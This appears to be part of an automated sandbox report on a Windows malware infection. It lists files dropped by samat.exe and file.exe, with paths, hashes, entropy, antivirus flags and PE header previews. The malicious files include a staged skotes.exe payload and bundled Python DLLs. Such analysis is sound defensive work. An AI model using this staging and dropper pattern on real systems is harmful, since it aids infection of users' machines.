Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.J+.z$x.z$x.z$x...x.z$xW.%y.z$xc..x.z$xW.!y.z$xW. y.z$xW.'y.z$xN. y.z$xM.%y.z$xN.%y.z$x.z%x.z$x..-y.z$x..$y.z$x..&y.z$xRich.z$x................PE..d...X..g.........." .........................................................`............`.........................................0...lB......,....@..l.... ...............P..0....a..T............................b..8...............p............................text...9........................... ..`.rdata..............................@..@.data....-.......(..................@....pdata....... ......................@..@.rsrc...l....@......................@..@.reloc..0....P......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\select.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	30992
Entropy (8bit):	6.554484610649281
Encrypted:	false
SSDEEP:	384:7hhxm9tKLhuoNHfzzlvFy0ZZIJ9GckHQIYiSy1pCQ4HWSJIVE8E9VF0Ny6sC:tCytHf98uZIJ9Gx5YiSyvy2ES
MD5:	20831703486869B470006941B4D996F2
SHA1:	28851DFD43706542CD3EF1B88B5E2749562DFEE0
SHA-256:	78E5994C29D8851F28B5B12D59D742D876683AEA58ECEEA1FB895B2036CDCDEB
SHA-512:	4AAF5D66D2B73F939B9A91E7EDDFEB2CE2476C625586EF227B312230414C064AA850B02A4028363AA4664408C9510594754530A6D026A0A84BE0168D677C1BC4
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........tV..'V..'V..'_.j'T..'F:.&T..'F:.&R..'F:.&^..'F:.&Z..'.;.&T..'V..'...'...&S..'.;.&W..'.;.&W..'.;.'W..'.;.&W..'RichV..'................PE..d.....g.........." ...).....2............................................................`..........................................@..L...<A..x....p.......`.......J.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...p....P.......8..............@....pdata.......`.......:..............@..@.rsrc........p.......>..............@..@.reloc..L............H..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\INSTALLER

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\LICENSE

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	11358
Entropy (8bit):	4.4267168336581415
Encrypted:	false
SSDEEP:	192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEn7HbHR:U9vlKM1zJlFvmNz5VrlkTS07Ht
MD5:	3B83EF96387F14655FC854DDC3C6BD57
SHA1:	2B8B815229AA8A61E483FB4BA0588B8B6C491890
SHA-256:	CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
SHA-512:	98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
Malicious:	false
Preview:	. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own

C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\METADATA

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4648
Entropy (8bit):	5.006900644756252
Encrypted:	false
SSDEEP:	96:Dx2ZSaCSmS8R902Vpnu386eLQ9Ac+fFZpDN00x2jZ2SBXZJSwTE:9Smzf02Vpnu386mQ9B+TP0vJHJSwTE
MD5:	98ABEAACC0E0E4FC385DFF67B607071A
SHA1:	E8C830D8B0942300C7C87B3B8FD15EA1396E07BD
SHA-256:	6A7B90EFFEE1E09D5B484CDF7232016A43E2D9CC9543BCBB8E494B1EC05E1F59
SHA-512:	F1D59046FFA5B0083A5259CEB03219CCDB8CC6AAC6247250CBD83E70F080784391FCC303F7630E1AD40E5CCF5041A57CB9B68ADEFEC1EBC6C31FCF7FFC65E9B7
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: importlib_metadata.Version: 8.0.0.Summary: Read metadata from Python packages.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Source, https://github.com/python/importlib_metadata.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: zipp >=0.5.Requires-Dist: typing-extensions >=3.6.4 ; python_version < "3.8".Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'doc'.Provides-Extra: perf.Requires-D

C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\RECORD

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	2518
Entropy (8bit):	5.6307766747793275
Encrypted:	false
SSDEEP:	48:UnuXTg06U5J/Vw9l/gfNX7/XzBk9pvJq/fwJOfYrBfnJ/V0XJnzN/3WJV:bXzP/EgdzzBkDJsoIYrBfJ/CXNz9qV
MD5:	EB513CAFA5226DDA7D54AFDCC9AD8A74
SHA1:	B394C7AEC158350BAF676AE3197BEF4D7158B31C
SHA-256:	0D8D3C6EEB9EBBE86CAC7D60861552433C329DA9EA51248B61D02BE2E5E64030
SHA-512:	A0017CFAFF47FDA6067E3C31775FACEE4728C3220C2D4BD70DEF328BD20AA71A343E39DA15CD6B406F62311894C518DFCF5C8A4AE6F853946F26A4B4E767924E
Malicious:	false
Preview:	importlib_metadata-8.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_metadata-8.0.0.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_metadata-8.0.0.dist-info/METADATA,sha256=anuQ7_7h4J1bSEzfcjIBakPi2cyVQ7y7jklLHsBeH1k,4648..importlib_metadata-8.0.0.dist-info/RECORD,,..importlib_metadata-8.0.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..importlib_metadata-8.0.0.dist-info/WHEEL,sha256=mguMlWGMX-VHnMpKOjjQidIo1ssRlCFu4a4mBpz1s2M,91..importlib_metadata-8.0.0.dist-info/top_level.txt,sha256=CO3fD9yylANiXkrMo4qHLV_mqXL2sC5JFKgt1yWAT-A,19..importlib_metadata/__init__.py,sha256=tZNB-23h8Bixi9uCrQqj9Yf0aeC--Josdy3IZRIQeB0,33798..importlib_metadata/__pycache__/__init__.cpython-312.pyc,,..importlib_metadata/__pycache__/_adapters.cpython-312.pyc,,..importlib_metadata/__pycache__/_collections.cpython-312.pyc,,..importlib_metadata/__pycache__/_compat.cpython-312.pyc,,..importlib_metadata/__pycac

C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\WHEEL

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	91
Entropy (8bit):	4.687870576189661
Encrypted:	false
SSDEEP:	3:RtEeXMRYFAVLMvhRRP+tPCCfA5S:RtC1VLMvhjWBBf
MD5:	7D09837492494019EA51F4E97823D79F
SHA1:	7829B4324BB542799494131A270EC3BDAD4DEDEF
SHA-256:	9A0B8C95618C5FE5479CCA4A3A38D089D228D6CB1194216EE1AE26069CF5B363
SHA-512:	A0063220ECDD22C3E735ACFF6DE559ACF3AC4C37B81D37633975A22A28B026F1935CD1957C0FF7D2ECC8B7F83F250310795EECC5273B893FFAB115098F7B9C38
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: setuptools (70.1.1).Root-Is-Purelib: true.Tag: py3-none-any..

C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\top_level.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	19
Entropy (8bit):	3.536886723742169
Encrypted:	false
SSDEEP:	3:JSej0EBERG:50o4G
MD5:	A24465F7850BA59507BF86D89165525C
SHA1:	4E61F9264DE74783B5924249BCFE1B06F178B9AD
SHA-256:	08EDDF0FDCB29403625E4ACCA38A872D5FE6A972F6B02E4914A82DD725804FE0
SHA-512:	ECF1F6B777970F5257BDDD353305447083008CEBD8E5A27C3D1DA9C7BDC3F9BF3ABD6881265906D6D5E11992653185C04A522F4DB5655FF75EEDB766F93D5D48
Malicious:	false
Preview:	importlib_metadata.

C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\jaraco\text\Lorem ipsum.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	ASCII text, with very long lines (888)
Category:	dropped
Size (bytes):	1335
Entropy (8bit):	4.226823573023539
Encrypted:	false
SSDEEP:	24:FP6Hbz+g9RPZ14bJi04L6GEbX4UQF4UkZQhxI2EIhNyu:9E+i6bJmLm43+Uxxnh0u
MD5:	4CE7501F6608F6CE4011D627979E1AE4
SHA1:	78363672264D9CD3F72D5C1D3665E1657B1A5071
SHA-256:	37FEDCFFBF73C4EB9F058F47677CB33203A436FF9390E4D38A8E01C9DAD28E0B
SHA-512:	A4CDF92725E1D740758DA4DD28DF5D1131F70CEF46946B173FE6956CC0341F019D7C4FECC3C9605F354E1308858721DADA825B4C19F59C5AD1CE01AB84C46B24
Malicious:	false
Preview:	Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum..Curabitur pretium tincidunt lacus. Nulla gravida orci a odio. Nullam varius, turpis et commodo pharetra, est eros bibendum elit, nec luctus magna felis sollicitudin mauris. Integer in mauris eu nibh euismod gravida. Duis ac tellus et risus vulputate vehicula. Donec lobortis risus a elit. Etiam tempor. Ut ullamcorper, ligula eu tempor congue, eros est euismod turpis, id tincidunt sapien risus a quam. Maecenas fermentum consequat mi. Donec fermentum. Pellentesque malesuada nulla a mi. Duis sapien sem, aliquet nec, commodo eget, consequat quis, neque.

C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info\INSTALLER

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Mn:M
MD5:	365C9BFEB7D89244F2CE01C1DE44CB85
SHA1:	D7A03141D5D6B1E88B6B59EF08B6681DF212C599
SHA-256:	CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
SHA-512:	D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
Malicious:	false
Preview:	pip.

C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info\LICENSE.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1107
Entropy (8bit):	5.115074330424529
Encrypted:	false
SSDEEP:	24:PWmrRONJHLH0cPP3gtkHw1h39QHOsUv4eOk4/+jvho3nPz:ttONJbbvE/NQHOs5eNS3n7
MD5:	7FFB0DB04527CFE380E4F2726BD05EBF
SHA1:	5B39C45A91A556E5F1599604F1799E4027FA0E60
SHA-256:	30C23618679108F3E8EA1D2A658C7CA417BDFC891C98EF1A89FA4FF0C9828654
SHA-512:	205F284F3A7E8E696C70ED7B856EE98C1671C68893F0952EEC40915A383BC452B99899BDC401F9FE161A1BF9B6E2CEA3BCD90615EEE9173301657A2CE4BAFE14
Malicious:	false
Preview:	MIT License..Copyright (c) 2012 Daniel Holth <dholth@fastmail.fm> and contributors..Permission is hereby granted, free of charge, to any person obtaining a.copy of this software and associated documentation files (the "Software"),.to deal in the Software without restriction, including without limitation.the rights to use, copy, modify, merge, publish, distribute, sublicense,.and/or sell copies of the Software, and to permit persons to whom the.Software is furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included.in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL.THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR.OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERW

C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info\METADATA

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	2153
Entropy (8bit):	5.088249746074878
Encrypted:	false
SSDEEP:	48:DEhpFu5MktjaywDK48d+md+7uT8RfkD1UKd+mOl1Awry:DEhpiMktjayq/7kOfsUzmbYy
MD5:	EBEA27DA14E3F453119DC72D84343E8C
SHA1:	7CEB6DBE498B69ABF4087637C6F500742FF7E2B4
SHA-256:	59BAC22B00A59D3E5608A56B8CF8EFC43831A36B72792EE4389C9CD4669C7841
SHA-512:	A41593939B9325D40CB67FD3F41CD1C9E9978F162487FB469094C41440B5F48016B9A66BE2E6E4A0406D6EEDB25CE4F5A860BA1E3DC924B81F63CEEE3AE31117
Malicious:	false
Preview:	Metadata-Version: 2.1.Name: wheel.Version: 0.43.0.Summary: A built-package format for Python.Keywords: wheel,packaging.Author-email: Daniel Holth <dholth@fastmail.fm>.Maintainer-email: Alex Gr.nholm <alex.gronholm@nextday.fi>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Requires-Dist: pytest >= 6.0.0 ; extra == "test".Requires-Dist: setuptools >= 65 ; extra == "test".Project-URL: Changelog, https://wheel.readthedocs.io/en/s

C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info\RECORD

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	4557
Entropy (8bit):	5.714200636114494
Encrypted:	false
SSDEEP:	96:QXVuEmegx01TQIvFCiq9H/H7vp88FxTXiJPkGJP4CWweXQHmnDpMI78IegK5EeZR:QXVxAbYkU4CWweXQHmnDpMeV2BvTRqQF
MD5:	44D352C4997560C7BFB82D9360F5985A
SHA1:	BE58C7B8AB32790384E4E4F20865C4A88414B67A
SHA-256:	783E654742611AF88CD9F00BF01A431A219DB536556E63FF981C7BD673070AC9
SHA-512:	281B1D939A560E6A08D0606E5E8CE15F086B4B45738AB41ED6B5821968DC8D764CD6B25DB6BA562A07018C271ABF17A6BC5A380FAD05696ADF1D11EE2C5749C8
Malicious:	false
Preview:	../../bin/wheel,sha256=cT2EHbrv-J-UyUXu26cDY-0I7RgcruysJeHFanT1Xfo,249..wheel-0.43.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..wheel-0.43.0.dist-info/LICENSE.txt,sha256=MMI2GGeRCPPo6h0qZYx8pBe9_IkcmO8aifpP8MmChlQ,1107..wheel-0.43.0.dist-info/METADATA,sha256=WbrCKwClnT5WCKVrjPjvxDgxo2tyeS7kOJyc1GaceEE,2153..wheel-0.43.0.dist-info/RECORD,,..wheel-0.43.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..wheel-0.43.0.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..wheel-0.43.0.dist-info/entry_points.txt,sha256=rTY1BbkPHhkGMm4Q3F0pIzJBzW2kMxoG1oriffvGdA0,104..wheel/__init__.py,sha256=D6jhH00eMzbgrXGAeOwVfD5i-lCAMMycuG1L0useDlo,59..wheel/__main__.py,sha256=NkMUnuTCGcOkgY0IBLgBCVC_BGGcWORx2K8jYGS12UE,455..wheel/__pycache__/__init__.cpython-312.pyc,,..wheel/__pycache__/__main__.cpython-312.pyc,,..wheel/__pycache__/_setuptools_logging.cpython-312.pyc,,..wheel/__pycache__/bdist_wheel.cpython-312.pyc,,..wheel/__pycache

C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info\WHEEL

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.672346887071811
Encrypted:	false
SSDEEP:	3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
MD5:	24019423EA7C0C2DF41C8272A3791E7B
SHA1:	AAE9ECFB44813B68CA525BA7FA0D988615399C86
SHA-256:	1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
SHA-512:	09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
Malicious:	false
Preview:	Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.

C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info\entry_points.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	104
Entropy (8bit):	4.271713330022269
Encrypted:	false
SSDEEP:	3:1SSAnAYgh+MWTMhk6WjrAM5t5ln:1Jb9WTMhk9jUM5t5ln
MD5:	6180E17C30BAE5B30DB371793FCE0085
SHA1:	E3A12C421562A77D90A13D8539A3A0F4D3228359
SHA-256:	AD363505B90F1E1906326E10DC5D29233241CD6DA4331A06D68AE27DFBC6740D
SHA-512:	69EAE7B1E181D7BA1D3E2864D31E1320625A375E76D3B2FBF8856B3B6515936ACE3138D4D442CABDE7576FCFBCBB0DEED054D90B95CFA1C99829DB12A9031E26
Malicious:	false
Preview:	[console_scripts].wheel=wheel.cli:main..[distutils.commands].bdist_wheel=wheel.bdist_wheel:bdist_wheel..

C:\Users\user\AppData\Local\Temp\_MEI52282\sqlite3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1540368
Entropy (8bit):	6.577233901213655
Encrypted:	false
SSDEEP:	24576:cmKZpHTv4iPI9FDgJNRs++l8GwLXSz4ih5Z5jWbsxuIl40OwumzuLxIhiE:0rJoDgJNRs+U8GwLXSMIZ5jWb0uIl48R
MD5:	7E632F3263D5049B14F5EDC9E7B8D356
SHA1:	92C5B5F96F1CBA82D73A8F013CBAF125CD0898B8
SHA-256:	66771FBD64E2D3B8514DD0CD319A04CA86CE2926A70F7482DDEC64049E21BE38
SHA-512:	CA1CC67D3EB63BCA3CE59EF34BECCE48042D7F93B807FFCD4155E4C4997DC8B39919AE52AB4E5897AE4DBCB47592C4086FAC690092CAA7AA8D3061FBA7FE04A2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gsX.#.6.#.6.#.6.*j../.6.3.7.!.6.3.5.'.6.3.2.+.6.3.3...6.hj7. .6.#.7...6.k.>.".6.k.6.".6.k..".6.k.4.".6.Rich#.6.........................PE..d.....g.........." ...).0...(.......................................................P....`..............................................#...........`...............R.../...p..X...0...T..............................@............@..X............................text...9........0.................. ..`.rdata..,....@.......4..............@..@.data...`M...0...D..................@....pdata...............\..............@..@.rsrc........`.......8..............@..@.reloc..X....p.......B..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\unicodedata.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	709904
Entropy (8bit):	5.861739047785334
Encrypted:	false
SSDEEP:	12288:FYGdLI/X77mvfldCKGihH32W3cnPSqrUgLIe:FYGW7qNxr3cnPXLIe
MD5:	0902D299A2A487A7B0C2D75862B13640
SHA1:	04BCBD5A11861A03A0D323A8050A677C3A88BE13
SHA-256:	2693C7EE4FBA55DC548F641C0CB94485D0E18596FFEF16541BD43A5104C28B20
SHA-512:	8CBEF5A9F2D24DA1014F8F1CCBDDD997A084A0B04DD56BCB6AC38DDB636D05EF7E4EA7F67A085363AAD3F43D45413914E55BDEF14A662E80BE955E6DFC2FECA3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.............(.....(.....(.....(.....)................).....).....)x....)....Rich..................PE..d.....g.........." ...).B...f......P,..............................................<.....`.........................................P...X................................/..........p...T...........................0...@............`..h............................text....@.......B.................. ..`.rdata...?...`...@...F..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI52282\win32\win32crypt.pyd

Download File

Process:	C:\Users\user\AppData\Local\Temp\1008029001\samat.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	125440
Entropy (8bit):	5.967992588245897
Encrypted:	false
SSDEEP:	1536:7ErQXAv52qRoQ79rwlaGVBA+xdPQQL1kUgZAO+sm2c83mL7g2kbB47a:7EgCiQ9roEoJptO+1pRL7ghbB47a
MD5:	94049E023814436E0A3560474F7057D1
SHA1:	28DDCCEE782B9613CE06224E2C80F67FBB2E16C7
SHA-256:	306022128185B4608E49400B7A3FD5954FF524C201D989833CB3AA5856562E97
SHA-512:	FCC00194624B668B39AB29D9D07F080668FB564C6558A9AB8E736052FB8CA596803A4B03DEE827BE915ACCB65251804A7661E976D314A453806D67DCE1269CF6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........g..I...I...I...@~r.O....s..M....s..Y....s..A....s..J...s..K.......K....~..N...I......s..@...s..H...s..H...RichI...........................PE..d...e..g.........." ................(........................................0............`.............................................................d.................... ..H....W..T............................W..8............ ...............................text...~........................... ..`.rdata..p.... ......................@..@.data....-.......(..................@....pdata..............................@..@.rsrc...d...........................@..@.reloc..H.... ......................@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\a697e606-aebb-44fe-a23a-c794904d1464.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	138356
Entropy (8bit):	7.809609231921042
Encrypted:	false
SSDEEP:	3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
MD5:	3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
SHA1:	9B73F46ADFA1F4464929B408407E73D4535C6827
SHA-256:	19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
SHA-512:	D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....\|..F....\|....V....w.%t.y..?..&..a..<.n....S+\|..=.ra.....

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1927680
Entropy (8bit):	7.952173231018088
Encrypted:	false
SSDEEP:	49152:FWpKS5ThF8/65kDlsW+eN3hyN0T3VsPhGlhFr5:FWcSKUkDlsJ0q0lfr
MD5:	6AED281D1464E3A53839BBD9E7190535
SHA1:	8EA6E9EC2EB3970E0C361538FB6DBD074E5FA6C2
SHA-256:	A20ABE49E71912D860044FDF813C7FB90F32FDE51097DB4B689CAC9C8F7A9AC9
SHA-512:	3D3312DBC5D3537143F8EE75097E9DFA5A88C59B3D0079461A6878BA1AAFA232A131E8078DBF08D5E62BDD84F5833E900D4B8E0F37E80B3BBCAB996B725E5366
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................pL...........@...........................L.....f.....@.................................W...k.......H....................[L.............................t[L..................................................... . ............................@....rsrc...H...........................@....idata ............................@... .`+.........................@...fjmpujlc.P....2..L..................@...jlhbczjq.....`L......D..............@....taggant.0...pL.."...H..............@...................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

